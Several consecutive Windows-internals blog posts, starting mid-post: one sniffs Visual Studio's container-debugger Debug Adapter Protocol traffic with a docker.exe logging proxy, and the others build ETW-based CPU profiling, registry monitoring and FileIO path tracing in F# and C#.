Unfortunately, Process Monitor does not understand managed stacks (displays them as <unknown>), but, on the bright side, that also means that Visual Studio debugger is a .NET application. Nevertheless, I needed to create a memory dump of the Visual Studio process and manually decode the managed frames. The WinDbg output for the first <unknown> frame looked as follows:

0:000> !ip2md 0x23e037ad
MethodDesc:   23da1038
Method Name:  Microsoft.VisualStudio.Debugger.VSCodeDebuggerHost.AD7.Implementation.LocalTargetInterop+LocalProcessWrapper..ctor(System.String, System.String)
Class:        23dc22ec
MethodTable:  23da10b0
mdToken:      06000b66
Module:       20e3642c
IsJitted:     yes
CodeAddr:     23e03618
Transparency: Critical

0:000> !DumpMT /d 23da10b0
EEClass:         23dc22ec
Module:          20e3642c
Name:            Microsoft.VisualStudio.Debugger.VSCodeDebuggerHost.AD7.Implementation.LocalTargetInterop+LocalProcessWrapper
mdToken:         020001cf
File:            c:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\ahdlch2w.npb\Microsoft.VisualStudio.Debugger.VSCodeDebuggerHost.dll
BaseSize:        0x14
ComponentSize:   0x0
Slots in VTable: 16
Number of IFaces in IFaceMap: 1

And the first frame already revealed the place where Visual Studio keeps the debugger assemblies. It was time to fire up ILSpy and indulge myself in some reversing 😊. Quite soon, I discovered that the Visual Studio engine communicates with the container debugger using the Debug Adapter Protocol. And interestingly, the communication happens over the process standard input/output. That explains the interactive docker session! With all the pieces matching, it was time to prove that everything is working the way I think it is.

Sniffing the debugger channel

At first, I started looking for some sniffers of the process input/output but couldn’t find any (let me know if you know such tools). Then I experimented with breakpoints in WinDbg, but it proved to be hard to find the right handle and then extract the exchanged bytes. Finally, I decided to write my own sniffer and replace the docker.exe process with it. After a few trials (it seems that Console.StandardInput.ReadAsync is a blocking call), I ended up with the following code:

class Program
    static void Main(string[] args)
        var psi = new ProcessStartInfo(Path.Combine(AppContext.BaseDirectory, "docker.bak.exe")) {
            RedirectStandardError = true,
            RedirectStandardInput = true,
            RedirectStandardOutput = true,
            UseShellExecute = false
        Array.ForEach(args, arg => psi.ArgumentList.Add(arg));

        var proc = Process.Start(psi);
        if (proc == null)
            Console.WriteLine("Error starting a process");

        Console.CancelKeyPress += (o, ev) => { ev.Cancel = true; proc.Kill(); };

        var baseLogName = Path.Combine(Directory.CreateDirectory("d:\\temp\\docker-proxy").FullName, $"{proc.Id}");
        using (var s = File.CreateText(baseLogName))
            s.WriteLine($"{psi.FileName} '{String.Join("', '", psi.ArgumentList)}'");
        using var inlogstream = File.Create(baseLogName + ".in");
        using var outlogstream = File.Create(baseLogName + ".out");
        using var errlogstream = File.Create(baseLogName + ".err");

        using var cts = new CancellationTokenSource();
        using var instream = Console.OpenStandardInput();
        using var outstream = Console.OpenStandardOutput();
        using var errstream = Console.OpenStandardError();

        var forwarders = new[] {
            ForwardStream(instream, proc.StandardInput.BaseStream, inlogstream, cts.Token),
            ForwardStream(proc.StandardOutput.BaseStream, outstream, outlogstream, cts.Token),
            ForwardStream(proc.StandardError.BaseStream, errstream, errlogstream, cts.Token)



    static async Task ForwardStream(Stream instream, Stream outstream, Stream logstream, CancellationToken ct)
        var b = new byte[4096];
        var inmem = new Memory<byte>(b, 0, b.Length);
        while (!ct.IsCancellationRequested)
            int bytesread = await instream.ReadAsync(inmem, ct);
            if (bytesread == 0 || ct.IsCancellationRequested)
            var outmem = new ReadOnlyMemory<byte>(b, 0, bytesread);
            await logstream.WriteAsync(outmem, ct);
            await outstream.WriteAsync(outmem, ct);
            await outstream.FlushAsync();

As you can see, for each docker.exe launch, I’m creating four files:

  • {pid} with a command line
  • {pid}.in with the bytes from the standard input (I am forwarding them to the target process)
  • {pid}.err with the bytes from the error output of the target process (I am pushing them on the sniffer error output)
  • {pid}.out with the bytes from the standard output of the target process (I am pushing them on the sniffer’s standard output)

Then, I build a single assembly of my sniffer (thanks .NET 5.0!):

dotnet publish -r win-x64 -p:PublishSingleFile=true -p:PublishTrimmed=true -p:IncludeNativeLibrariesForSelfExtract=true --self-contained true

And copied it to c:\ProgramData\DockerDesktop\version-bin. Then I renamed the docker.exe shortcut in this folder to docker.bak.exe and my sniffer to docker.exe. I launched Visual Studio debugger, and soon in the d:\temp\docker-proxy folder, logs from multiple docker sessions started appearing. And one of the sessions was the debugger one! 😁

Below, you may find two first messages from the .in and .out files arranged in the correct order:

Content-Length: 514

{"type":"request","command":"initialize","arguments":{"pathFormat":"path","clientID":"visualstudio","clientName":"Visual Studio","adapterID":"coreclr","locale":"en-US","linesStartAt1":true,"columnsStartAt1":true,"supportsVariableType":true,"supportsRunInTerminalRequest":true,"supportsMemoryReferences":true,"supportsProgressReporting":true,"SupportsMessageBox":true,"supportsHandshakeRequest":true,"supportsVsAdditionalBreakpointBinds":true,"supportsHitCountsChange":true,"supportsVsCustomMessages":true},"seq":1}
Content-Length: 1835

{"seq":0,"type":"response","request_seq":1,"success":true,"command":"initialize","body":{"supportsConfigurationDoneRequest":true,"supportsFunctionBreakpoints":true,"supportsConditionalBreakpoints":true,"supportsHitConditionalBreakpoints":true,"supportsEvaluateForHovers":true,"exceptionBreakpointFilters":[{"filter":"all","label":"All Exceptions","default":false},{"filter":"user-unhandled","label":"User-Unhandled Exceptions","default":true}],"supportsSetVariable":true,"supportsGotoTargetsRequest":true,"supportsModulesRequest":true,"additionalModuleColumns":[{"attributeName":"vsLoadAddress","label":"Load Address","type":"string"},{"attributeName":"vsPreferredLoadAddress","label":"Preferred Load Address","type":"string"},{"attributeName":"vsModuleSize","label":"Module Size","type":"number"},{"attributeName":"vsLoadOrder","label":"Order","type":"number"},{"attributeName":"vsTimestampUTC","label":"Timestamp","type":"unixTimestampUTC"},{"attributeName":"vsIs64Bit","label":"64-bit","type":"boolean"},{"attributeName":"vsAppDomain","label":"AppDomain","type":"string"},{"attributeName":"vsAppDomainId","label":"AppDomainId","type":"number"}],"supportedChecksumAlgorithms":["MD5","SHA1","SHA256"],"supportsExceptionOptions":true,"supportsValueFormattingOptions":true,"supportsExceptionInfoRequest":true,"supportTerminateDebuggee":true,"supportsSetExpression":true,"supportsReadMemoryRequest":true,"supportsCancelRequest":true,"supportsExceptionConditions":true,"supportsLoadSymbolsRequest":true,"supportsModuleSymbolSearchLog":true,"supportsDebuggerProperties":true,"supportsSetSymbolOptions":true,"supportsHitBreakpointIds":true,"supportsVsIndividualBreakpointOperations":true,"supportsSetHitCount":true,"supportsVsCustomMessages":true,"supportsEvaluationOptions":true,"supportsExceptionStackTrace":true,"supportsObjectId":true}}
Content-Length: 520

{"type":"request","command":"launch","arguments":{"name":".Net Core Launch","type":"coreclr","request":"launch","program":"dotnet","args":"--additionalProbingPath /root/.nuget/fallbackpackages2 --additionalProbingPath /root/.nuget/fallbackpackages  \"WebApplication1.dll\"","cwd":"/app","symbolOptions":{"cachePath":"/remote_debugger/symbols"},"env":{"ASPNETCORE_HTTPS_PORT":"49189"},"targetOutputLogPath":"/dev/console","projectFullPath":"C:\\Users\\me\\source\\repos\\WebApplication1\\WebApplication1.csproj"},"seq":2}
Content-Length: 117




A CPU sampling profiler in less than 200 lines

13 October 2020 at 17:15

While working on a new version of wtrace, I am analyzing the PerfView source code to learn how its various features work internally. One of such features is the call stack resolution for ETW events. This post will show you how to use the TraceEvent library to decode call stacks, and, as an exercise, we will write a sampling process profiler. Before we start, remember to set DisablePagingExecutive to 1. That is a requirement to make call stacks work for ETW sessions.

❗ ❗ ❗ Visit wtrace.net to receive updates on wtrace and my other troubleshooting tools. ❗ ❗ ❗

Collecting profiling data

First, we need to collect trace data that we will later analyze. Our profiler will rely on SampledProfile events. Enabling them makes the Kernel emit a profiling event every 1ms for every CPU in the system. The SampledProfile event has only two fields: InstructionPointer and ThreadId. InstructionPointer is an address in the memory, so to find a method name that matches it, we need information about the images loaded by a process (the ImageLoad event). Our code to start the kernel session could look as follows:

use session = new TraceEventSession(sessionName, etlFilePath)

let traceFlags = NtKeywords.Profile ||| NtKeywords.ImageLoad
let stackFlags = NtKeywords.Profile
session.EnableKernelProvider(traceFlags, stackFlags) |> ignore

That is enough to resolve call stacks from the native images (NGEN/R2R), where CPU executes the image’s compiled code. However, resolving managed call stacks requires some more data. For managed code, the instruction pointer points to a block of JIT-compiled code that resides in a process private memory and is valid only for the process lifetime. The Kernel does not know about the CLR internals, so we need to query the CLR ETW provider. Fortunately, the ClrTraceEventParser already has a flag which contains all the necessary keywords:

public sealed class ClrTraceEventParser : TraceEventParser
    /// <summary>
    ///  Keywords are passed to TraceEventSession.EnableProvider to enable particular sets of
    /// </summary>
    public enum Keywords : long
        /// <summary>
        /// What is needed to get symbols for JIT compiled code.  
        /// </summary>
        JITSymbols = Jit | StopEnumeration | JittedMethodILToNativeMap | SupressNGen | Loader,

We are ready to enable the CLR provider in our ETW session:

let keywords = ClrKeywords.JITSymbols
session.EnableProvider(ClrTraceEventParser.ProviderGuid, TraceEventLevel.Always, uint64(keywords)) |> ignore

Our session is now open and saves ETW events to the .etl file we specified. It’s time to perform the action we want to profile, for example, start a new process. When done, we should call Stop or Dispose to stop the ETW session and close the .etl file. For .NET processes that didn’t start or finish when the session was running, we also need to collect CLR rundown events. Without this data, we will lack JIT mappings, and we won’t be able to resolve some of the managed stacks. Here is the code for creating a rundown session:

let collectClrRundownEvents () = 
    let rec waitForRundownEvents filePath =
        // Poll until 2 seconds goes by without growth.
        let len = FileInfo(filePath).Length
        if FileInfo(filePath).Length = len then
            waitForRundownEvents filePath
        else ()

    printfn "Forcing rundown of JIT methods."
    let rundownFileName = Path.ChangeExtension(etlFilePath, ".clrRundown.etl")
    use rundownSession = new TraceEventSession(sessionName + "-rundown", rundownFileName)
        TraceEventLevel.Verbose, uint64(ClrRundownTraceEventParser.Keywords.Default)) |> ignore
    waitForRundownEvents rundownFileName
    printfn "Done with rundown."

The final steps are to merge the .etl files, add necessary module information, and prepare symbol files for the pre-compiled assemblies. Fortunately, the TraceEvent library has one method that performs all the operations mentioned above: ZippedETLWriter.WriteArchive. Internally, this method uses KernelTraceControl.dll!CreateMergedTraceFile (from WPT) to merge the .etl files and generate ‘synthetic’ events for all the modules which were loaded by processes during the trace session. If you’d like to see the PInvoke signature of this method, decrypt the OSExtensions.cs file. For all the pre-compiled assemblies (ETWTraceEventSource.GetModulesNeedingSymbols) TraceEvent generates the .pdb files (SymbolReader.GenerateNGenSymbolsForModule) and packs them into the final .zip file.

Our final recording code looks as follows:

    use session = new TraceEventSession(sessionName, etlFilePath)

    let traceFlags = NtKeywords.Profile ||| NtKeywords.ImageLoad // NtKeywords.Process and NtKeywords.Thread are added automatically
    let stackFlags = NtKeywords.Profile
    session.EnableKernelProvider(traceFlags, stackFlags) |> ignore

    // we need CLR to resolve managed stacks
    let keywords = ClrKeywords.JITSymbols
    session.EnableProvider(ClrTraceEventParser.ProviderGuid, TraceEventLevel.Always, uint64(keywords)) |> ignore

    printfn "Press enter to stop the tracing session"
    Console.ReadLine() |> ignore

    session.Stop() |> ignore

    collectClrRundownEvents ()

printfn "Collecting the data required for stack resolution..."
let writer = ZippedETLWriter(etlFilePath, log)
if not (writer.WriteArchive(Compression.CompressionLevel.NoCompression)) then
    printfn "Error occured while merging the data"
    printfn "Trace session completed"

It is very similar to the 40_SimpleTraceLog sample from the Perfview repository. So if you are looking for C# code, check it out.

Analyzing call stacks with TraceLog

Once we finished and post-processed the trace session, it’s time to analyze the collected events. Usually, when we want to process ETW events, we create the TraceEventSession instance and assign callbacks for interesting events. Using callbacks to the TraceEventSession source is the most efficient way of processing ETW events. However, this approach has some drawbacks. TraceEventParser instances are usually stateless, so if you need to work on aggregated data (processes, threads, modules), you need to implement the aggregation logic. For example, to list process lifetimes saved in the trace, we need to process the ProcessStartGroup and ProcessEndGroup events. Resolving call stacks is even more demanding and involves examining different groups of events. Fortunately, the TraceEvent library again gives us a hand and provides the TraceLog class. As stated in the documentation, TraceLog represents a higher-level event processing. It keeps a backlog of various session objects, including processes, threads, and call stacks. Our task is to instantiate the SymbolReader class, download or unpack the required symbol files, and process the event call stacks. The code below does all that:

type CallStackNode (callsCount : int32) =
    inherit Dictionary<string, CallStackNode>(StringComparer.OrdinalIgnoreCase)
    member val CallsCount = callsCount with get, set

let loadSymbols (traceLog : TraceLog) (proc : TraceProcess) =
    use symbolReader = new SymbolReader(log)

    proc.LoadedModules |> Seq.where (fun m -> not (isNull m.ModuleFile))
                       |> Seq.iter (fun m -> traceLog.CodeAddresses.LookupSymbolsForModule(symbolReader, m.ModuleFile))

let buildCallStacksTree (traceLog : TraceLog) pid tid =
    let perfInfoTaskGuid = Guid(int32 0xce1dbfb4, int16 0x137e, int16 0x4da6, byte 0x87, byte 0xb0, byte 0x3f, byte 0x59, byte 0xaa, byte 0x10, byte 0x2c, byte 0xbc)
    let perfInfoOpcode = 46

    let callStacks = CallStackNode(0)
    let processCallStack (callStack : TraceCallStack) =
        let addOrUpdateChildNode (node : CallStackNode) (callStack : TraceCallStack) =
            let decodedAddress = sprintf "%s!%s" callStack.CodeAddress.ModuleName callStack.CodeAddress.FullMethodName
            match node.TryGetValue(decodedAddress) with
            | (true, childNode) ->
                childNode.CallsCount <- childNode.CallsCount + 1
            | (false, _) ->
                let childNode = CallStackNode(1)
                node.Add(decodedAddress, childNode)

        let rec processStackFrame (callStackNode : CallStackNode) (callStack : TraceCallStack) =
            let caller = callStack.Caller
            if isNull caller then // root node
                callStackNode.CallsCount <- callStackNode.CallsCount + 1
            let childNode = 
                if isNull caller then addOrUpdateChildNode callStackNode callStack
                else processStackFrame callStackNode caller

            addOrUpdateChildNode childNode callStack
        processStackFrame callStacks callStack |> ignore
    |> Seq.filter (fun ev -> ev.ProcessID = pid && ev.ThreadID = tid && ev.TaskGuid = perfInfoTaskGuid && (int32 ev.Opcode = perfInfoOpcode))
    |> Seq.iter (fun ev -> processCallStack (ev.CallStack()))


let tryFindProcess (traceLog : TraceLog) processNameOrPid =
    let (|Pid|ProcessName|) (s : string) =
        match Int32.TryParse(s) with
        | (true, pid) -> Pid pid
        | (false, _) -> ProcessName s

    let filter =
        match processNameOrPid with
        | Pid pid -> fun (p : TraceProcess) -> p.ProcessID = pid
        | ProcessName name -> fun (p : TraceProcess) -> String.Equals(p.Name, name, StringComparison.OrdinalIgnoreCase)

    let processes = traceLog.Processes |> Seq.where filter |> Seq.toArray
    if processes.Length = 0 then
    elif processes.Length = 1 then
        Some processes.[0]
        processes |> Seq.iteri (fun i p -> printfn "[%d] %s (%d): '%s'" i p.Name p.ProcessID p.CommandLine)
        printf "Which process to analyze []: "
        match Int32.TryParse(Console.ReadLine()) with
        | (false, _) -> None
        | (true, n) -> processes |> Seq.tryItem n

let analyze processNameOrPid maxDepth =

    let reader = ZippedETLReader(etlFilePath + ".zip", log)
    let options = TraceLogOptions(ConversionLog = log)
    let traceLog = TraceLog.OpenOrConvert(etlFilePath, options)

    match tryFindProcess traceLog processNameOrPid with
    | None -> printfn "No matching process found in the trace"
    | Some proc ->
        printfn "%s [%s] (%d)" proc.Name proc.CommandLine proc.ProcessID

        let sw = Stopwatch.StartNew()
        printfn "[%6d ms] Loading symbols for modules in process %s (%d)" sw.ElapsedMilliseconds proc.Name proc.ProcessID
        loadSymbols traceLog proc

        // usually, system process has PID 4, but TraceEvent attaches the drivers to the Idle process (0)
        let systemProc = traceLog.Processes |> Seq.where (fun p -> p.ProcessID = 0) |> Seq.exactlyOne

        printfn "[%6d ms] Loading symbols for system modules" sw.ElapsedMilliseconds
        loadSymbols traceLog systemProc

        printfn "[%6d ms] Starting call stack analysis" sw.ElapsedMilliseconds
        let printThreadCallStacks (thread : TraceThread) =
            let callStacks = buildCallStacksTree traceLog proc.ProcessID thread.ThreadID

            let rec getCallStack depth name (callStack : CallStackNode) =
                let folder frames (kv : KeyValuePair<string, CallStackNode>) =
                    if kv.Value.Count = 0 || (maxDepth > 0 && depth >= maxDepth) then frames
                    else getCallStack (depth + 1) kv.Key kv.Value |> List.append frames

                |> Seq.fold folder [ (sprintf "%s├─ %s [%d]" ("│ " |> String.replicate depth) name callStack.CallsCount) ]

            let stacks = getCallStack 0 (sprintf "Thread (%d) '%s'" thread.ThreadID thread.ThreadInfo) callStacks
            stacks |> List.iter (fun s -> printfn "%s" s)
        proc.Threads |> Seq.iter printThreadCallStacks
        printfn "[%6d ms] Completed call stack analysis" sw.ElapsedMilliseconds

An example output might look as follows (I removed some lines for brevity):

PS netcoreapp3.1> .\etwprofiler.exe analyze testproc 10
testproc ["C:\Users\me\testproc.exe" ] (15416)
[     2 ms] Loading symbols for modules in process testproc (15416)
[   428 ms] Loading symbols for system modules
[ 21400 ms] Starting call stack analysis
├─ Thread (2412) 'Startup Thread' [121]
│ ├─ ntdll!LdrInitializeThunk [11]
│ │ ├─ ntdll!LdrInitializeThunk [11]
│ │ │ ├─ ntdll!LdrpInitialize [11]
│ │ │ │ ├─ ntdll!??_LdrpInitialize [11]
│ │ │ │ │ ├─ ntdll!LdrpInitializeProcess [11]
│ │ │ │ │ │ ├─ ntdll!LdrpInitializeTls [1]
│ │ │ │ │ │ ├─ ntdll!LdrLoadDll [2]
│ │ │ │ │ │ │ ├─ ntdll!LdrpLoadDll [2]
├─ Thread (24168) '' [1]
│ ├─ ntdll!RtlUserThreadStart [1]
│ │ ├─ ntdll!RtlUserThreadStart [1]
│ │ │ ├─ kernel32!BaseThreadInitThunk [1]
│ │ │ │ ├─ ntdll!TppWorkerThread [1]
│ │ │ │ │ ├─ ntdll!TppAlpcpExecuteCallback [1]
│ │ │ │ │ │ ├─ rpcrt4!LrpcIoComplete [1]
│ │ │ │ │ │ │ ├─ rpcrt4!LRPC_ADDRESS::ProcessIO [1]
├─ Thread (9808) '' [0]
├─ Thread (22856) '.NET ThreadPool Worker' [1]
│ ├─ ntdll!RtlUserThreadStart [1]
│ │ ├─ ntdll!RtlUserThreadStart [1]
│ │ │ ├─ kernel32!BaseThreadInitThunk [1]
│ │ │ │ ├─ coreclr!Thread::intermediateThreadProc [1]
│ │ │ │ │ ├─ coreclr!ThreadpoolMgr::WorkerThreadStart [1]
│ │ │ │ │ │ ├─ coreclr!UnManagedPerAppDomainTPCount::DispatchWorkItem [1]
│ │ │ │ │ │ │ ├─ coreclr!ThreadpoolMgr::AsyncTimerCallbackCompletion [1]
│ │ │ │ │ │ │ │ ├─ coreclr!AppDomainTimerCallback [1]
│ │ │ │ │ │ │ │ │ ├─ coreclr!ManagedThreadBase_DispatchOuter [1]
│ │ │ │ │ │ │ │ │ │ ├─ coreclr!ManagedThreadBase_DispatchMiddle [1]
├─ Thread (12352) '.NET ThreadPool Gate' [0]
[ 21835 ms] Completed call stack analysis

The full profiler code is available in my blog samples repository. For my Dotnetos session about tracing, I also prepared the C# version so you may check it too. And, of course, I invite you to watch the whole session! 🙂



Monitoring registry activity with ETW

20 August 2020 at 12:55

If you are working on Windows, you know that the registry is a crucial component of this system. It contains lots of system and application configuration data. Apps use the registry to access some of the in-memory OS data. Therefore, monitoring the registry activity is one of the essential parts of the troubleshooting process. Fortunately, we have several tools to help us with this task, Process Monitor being probably the most popular one. In this post, though, I am going to prove that we could use ETW for this purpose as well.

A brief introduction to the registry paths

The way how the registry stores its data is quite complicated. I will focus only on the parts required to understand the ETW data, so if you would like to dig deeper, check the awesome Windows Internals book. When we think of the registry structure, we usually imagine the Regedit panel with subtrees under a few root keys:

The root key names, such as HKEY_LOCAL_MACHINE (or HKLM), translate internally to paths understandable by the Windows object manager. For example, HKLM would become \Registry\Machine. The \Registry part references a kernel key object that we can find using, for example, WinObjEx64:

When an application tries to access a registry path, the object manager forwards the call to the configuration manager. The configuration manager parses the path and returns a handle to a key object. Each key object points to its corresponding key control block (KCB). This KCB could be shared with other key objects as the configuration manager allocates exactly one KCB for a given registry path. Additionally, each KCB has a reference count, which reflects the number of key objects referencing it. Let’s see this in action while also recording the ETW events.

Registry events

We will use the simple code below to create and later delete a registry key with a string value:

let subkey = "Software\\LowLevelDesign"

use hkcu = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Default)
    use mytraceKey = hkcu.CreateSubKey(subkey)
    mytraceKey.SetValue("start", DateTime.UtcNow.ToString(), RegistryValueKind.String)

Console.WriteLine("Press enter to delete the key...")
Console.ReadLine() |> ignore


In a moment, I will explain why I am creating the LowLevelDesign key in a separate using scope. But first, let’s check the ETW trace for these operations:

4065.7271 (21776.18288) Registry/Open [0xFFFFAE0C9795E860] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\Software\LowLevelDesign' [0] -> 0 (0.01540)
4066.5557 (21776.18288) Registry/Open [0xFFFFAE0C9795E860] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\Software\LowLevelDesign' [0] -> 0 (0.00850)
4066.5796 Registry/KCBCreate [0xFFFFAE0CC1544D20] <- '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN'
4066.6179 (21776.18288) Registry/Create [0xFFFFAE0C9795E860] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\Software\LowLevelDesign' [0] -> 0 (0.10650)
4070.3576 (21776.18288) Registry/SetValue [0xFFFFAE0CC1544D20] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN\start' [0] -> 0 (0.02800)
4070.3731 (21776.18288) Registry/Close [0xFFFFAE0CC1544D20] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN' [0] -> 0 (0.00020)

<Enter pressed>

144250.1876 (21776.18288) Registry/Open [0xFFFFAE0C9795E860] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\Software\LowLevelDesign' [0] -> 0 (0.02720)
144250.2030 (21776.18288) Registry/Query [0xFFFFAE0CC1544D20] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN' [0] -> 0 (0.00430)
144250.2135 (21776.18288) Registry/Close [0xFFFFAE0CC1544D20] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN' [0] -> 0 (0.00010)
144250.7885 (21776.18288) Registry/Open [0xFFFFAE0C9795E860] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\Software\LowLevelDesign' [0] -> 0 (0.00860)
144250.9071 (21776.18288) Registry/Delete [0xFFFFAE0CC1544D20] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN' [0] -> 0 (0.06300)
144250.9087 (21776.18288) Registry/Close [0xFFFFAE0CC1544D20] = '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN' [0] -> 0 (0.00020)
144250.9118 Registry/KCBDelete [0xFFFFAE0CC1544D20] <- '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN'

If you look at the paths in the trace, you will immediately see that ETW uses the “kernel” registry paths (starting with \Registry). As the LowLevelDesign registry key didn’t exist when the app started, the configuration manager needed to create it. That’s the KCBCreate event we see in the trace:

4066.5796 Registry/KCBCreate [0xFFFFAE0CC1544D20] <- '\REGISTRY\USER\S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN'

We can confirm that the address is indeed a valid KCB address in WinDbg:

lkd> !reg kcb 0xFFFFAE0CC1544D20

Key              : \REGISTRY\USER\S-S-1-5-21-435461841-1121519493-2341496315-1001\SOFTWARE\LOWLEVELDESIGN
RefCount         : 0x0000000000000000
Flags            : DelayedClose, CompressedName,
ExtFlags         :
Parent           : 0xffffae0c9ac26600
KeyHive          : 0xffffae0c9a174000
KeyCell          : 0xed9160 [cell index]
TotalLevels      : 5
LayerHeight      : 0
MaxNameLen       : 0x0
MaxValueNameLen  : 0xa
MaxValueDataLen  : 0x28
LastWriteTime    : 0x 1d6760a:0x8c2420e6
KeyBodyListHead  : 0xffffae0cc1544d98 0xffffae0cc1544d98
SubKeyCount      : 0
Owner            : 0x0000000000000000
KCBLock          : 0xffffae0cc1544e18
KeyLock          : 0xffffae0cc1544e28

When I closed all the handles and deleted the LowLevelDesign key, the kernel emitted the KCBDelete key. Interestingly, when I created and deleted the LowLevelDesign key without disposing of mytraceKey, the KCBDelete event was missing. Also, the LowLevelDesign KCB address was soon reused by another key. That’s why I placed the using scope in the original code. Let’s look in the tracing application code and explain other hex values from the trace.

KCBs, registry key names, and the trace session

All registry ETW events have the same format, but the meaning of the KeyName property is different for various OpCodes. To correctly resolve key names in “regular” registry events, we need to analyze the KCB events first. For KCBs opened/created during the trace session, we should receive a KCBCreate event. From this event, we need to save the FileName with its corresponding KeyHandle. To acquire FileNames for KCBs that were opened before our trace session started, we need to run a rundown session. This procedure is very similar to what I did for the FileIORundown events in the previous post. Sample code looks as follows:

let regHandleToKeyName = Dictionary<uint64, string>()

let processKCBCreateEvent (ev : RegistryTraceData) =
    printfn "%.4f %s [0x%X] <- '%s'" ev.TimeStampRelativeMSec ev.EventName ev.KeyHandle ev.KeyName 
    regHandleToKeyName.[ev.KeyHandle] <- ev.KeyName

let processKCBDeleteEvent (ev : RegistryTraceData) =
    printfn "%.4f %s [0x%X] <- '%s'" ev.TimeStampRelativeMSec ev.EventName ev.KeyHandle ev.KeyName 
    regHandleToKeyName.Remove(ev.KeyHandle) |> ignore

let runRundownSession sessionName =
    printf "Starting rundown session %s" sessionName
    use session = new TraceEventSession(sessionName)

    let traceFlags = NtKeywords.Registry

    session.EnableKernelProvider(traceFlags, NtKeywords.None) |> ignore

    // Accessing the source enables kernel provider so must be run after the EnableKernelProvider call
    makeKernelParserStateless session.Source

    // Rundown session lasts 2 secs - make it longer, if required
    use cts = new CancellationTokenSource(TimeSpan.FromSeconds(2.0))
    use _r = cts.Token.Register(fun _ -> session.Stop() |> ignore)

    session.Source.Process() |> ignore

Now, when a registry event has a non-zero KeyHandle value, we need to look up the parent path in the regHandleToKeyName dictionary and prepend it to the KeyName value from the event payload. Finally, for the “key-value” events (such as EVENT_TRACE_TYPE_REGSETVALUE), the KeyName property is, in fact, a value name. Fortunately, the RegistryTraceData class fixes this confusion by providing a ValueName property. We only need to make sure we use it for valid events. Below, you may find sample code for handling the “regular” registry events:

let filter (ev : RegistryTraceData) =
    ev.ProcessID = pid || ev.ProcessID = -1

let getFullKeyName keyHandle eventKeyName =
    let baseKeyName =
        match regHandleToKeyName.TryGetValue(keyHandle) with
        | (true, name) -> name
        | (false, _) -> ""
    Path.Combine(baseKeyName, eventKeyName)

let processKeyEvent (ev : RegistryTraceData) =
    if filter ev then
        let keyName = getFullKeyName ev.KeyHandle ev.KeyName
        printfn "%.4f (%d.%d) %s [0x%X] = '%s' [%d] -> %d (%.5f)" 
            ev.TimeStampRelativeMSec ev.ProcessID ev.ThreadID ev.EventName 
            ev.KeyHandle keyName ev.Index ev.Status ev.ElapsedTimeMSec

let processValueEvent (ev : RegistryTraceData) =
    if filter ev then
        let keyName = getFullKeyName ev.KeyHandle ev.ValueName
        printfn "%.4f (%d.%d) %s [0x%X] = '%s' [%d] -> %d (%.5f)" 
            ev.TimeStampRelativeMSec ev.ProcessID ev.ThreadID ev.EventName 
            ev.KeyHandle keyName ev.Index ev.Status ev.ElapsedTimeMSec

And the full tracer sample is available in my blog samples repository. Remember to run the code as Admin.



Fixing empty paths in FileIO events (ETW)

15 August 2020 at 13:42

This month marks ten years since I started this blog 🥂🥂🥂. On this occasion, I would like to thank you for being my reader! Let’s celebrate with a new post on ETW 🙂

Empty paths issue in the wtrace output has been bugging me for quite some time. As I started working on a new wtrace release (coming soon!), there came the right moment to fix it. I’ve seen other people struggling with this problem too, so I thought that maybe it’s worth a blog post 🙂 Wtrace uses the TraceEvent library to interact with the ETW API, and in this post, I will use this library as well. Note that this issue affects only the real-time ETW sessions.

Tracing FileIO events

Overall, when it comes to storage I/O tracing, there are two classes of events: DiskIO and FileIO. DiskIO events represent disk driver operations, while FileIO events describe the calls to the file system. I consider wtrace a user-mode troubleshooting tool. Therefore I decided to trace only the file system events. Another benefit of using FileIO events is that they are emitted even when the file system cache handles the I/O request.

Enabling FileIO events in the trace session requires only the FileIOInit flag in the call to TraceEventSession.EnableKernelProvider. You may also add the FileIO flag if you want to track the IO request duration (new wtrace will do that). The next step is to add handlers to the interesting FileIO events, for example:

public void SubscribeToSession(TraceEventSession session)
    var kernel = session.Source.Kernel;
    kernel.FileIOClose += HandleFileIoSimpleOp;
    kernel.FileIOFlush += HandleFileIoSimpleOp;
    kernel.FileIOCreate += HandleFileIoCreate;
    kernel.FileIODelete += HandleFileIoInfo;
    kernel.FileIORename += HandleFileIoInfo;
    kernel.FileIOFileCreate += HandleFileIoName;
    kernel.FileIOFileDelete += HandleFileIoName;
    kernel.FileIOFileRundown += HandleFileIoName;
    kernel.FileIOName += HandleFileIoName;
    kernel.FileIORead += HandleFileIoReadWrite;
    kernel.FileIOWrite += HandleFileIoReadWrite;
    kernel.FileIOMapFile += HandleFileIoMapFile;

However, you will shortly discover that the FileName property will sometimes return an empty string. An example wtrace output with this problem:

1136,1873 (1072) FileIO/Close 'C:\' (0xFFFFFA801D789CA0)
1136,2049 (1072) FileIO/Create 'C:\Windows\SYSTEM32\wow64win.dll' (0xFFFFFA801D789CA0) rw-
1363,8894 (1072) FileIO/Read '' (0xFFFFFA80230F5970) 0x173400 32768b
1364,7208 (1072) FileIO/Read '' (0xFFFFFA80230F5970) 0x117400 32768b
1365,6873 (1072) FileIO/Read '' (0xFFFFFA80230F5970) 0x1CD400 32768b
